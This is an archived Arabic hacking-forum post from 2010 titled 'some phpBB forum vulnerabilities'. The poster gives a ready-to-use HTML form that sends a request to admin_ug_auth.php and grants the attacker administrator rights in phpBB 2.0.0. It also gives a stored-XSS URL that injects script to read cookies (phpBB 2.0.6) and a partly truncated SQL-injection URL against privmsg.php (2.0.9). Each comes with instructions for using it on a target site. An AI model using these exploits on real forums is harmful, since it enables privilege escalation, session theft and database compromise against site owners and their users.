التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-24-2010, 05:45 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Hacker X4X
 

 

 
إحصائية العضو






Hacker X4X غير متواجد حالياً

إرسال رسالة عبر MSN إلى Hacker X4X إرسال رسالة عبر Skype إلى Hacker X4X

 

 

إحصائية الترشيح

عدد النقاط : 10
Hacker X4X is on a distinguished road

.................... بعــــض ثغرات منتدى phpbb ادخل وشــــوف


[align=center]!بســــــــــــم الله الرحمـــــــــــــــــــــــــــــــــن الرحيـــــــــــــــــــــــــــــــــــم ![/align]

بعـــض طرق اختـــراق منتدى phpbb
ثغرة خطيرة من منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت

الأصدار:
2.0.0[align=center]
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها[/align]
كود PHP:
<html>
<head>
</head>
******>

<form method="post"
action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك



::::::::
ثغره فى الاصدار Powered by phpbb 2.0.6

كل ما عليك تطبق الكود
كود PHP:
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe********>********.write(********.******);</s cript>&category_rows[0][cat_order]=99
ثغره فى الاصدار Powered by phpbb 2.0.9

كل ما عليك هو تطبق هذا الكود


كود PHP:
http://www.xxxxx.com/privmsg.php?fo...20LIMI T%201

[align=center]اخوكم Hacker X4X[/align]


fuJJJJq eyvhj lkj]n phpbb h]og ,aJJJJ,t

التوقيع

http://www.monsterup.com/upload/1263672786903.jpg

انا في الخدمة و هدا امايلي لتبادل الخبرات و تنمية القدرات
x_4x@live.fr

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
كيف اخترق موقع تبع شركة احلي منتدي او حتي ادخل بالادمن Mr-JoKeR جـــ'ابات العناكــ'ب 11 07-31-2012 05:42 AM
اول اختراق بدون رفع شيل او ثغرات ....غريب ادخل وشوف .~Amer.?AlnJ0M~.! Hackers Showoff 14 12-10-2009 10:07 PM
شرح رفع الأندكس من لوحة تحكم منتديات phpbb إستضافة أحلى منتدى pirate87 قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 25 05-29-2009 06:29 PM


الساعة الآن 12:19 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0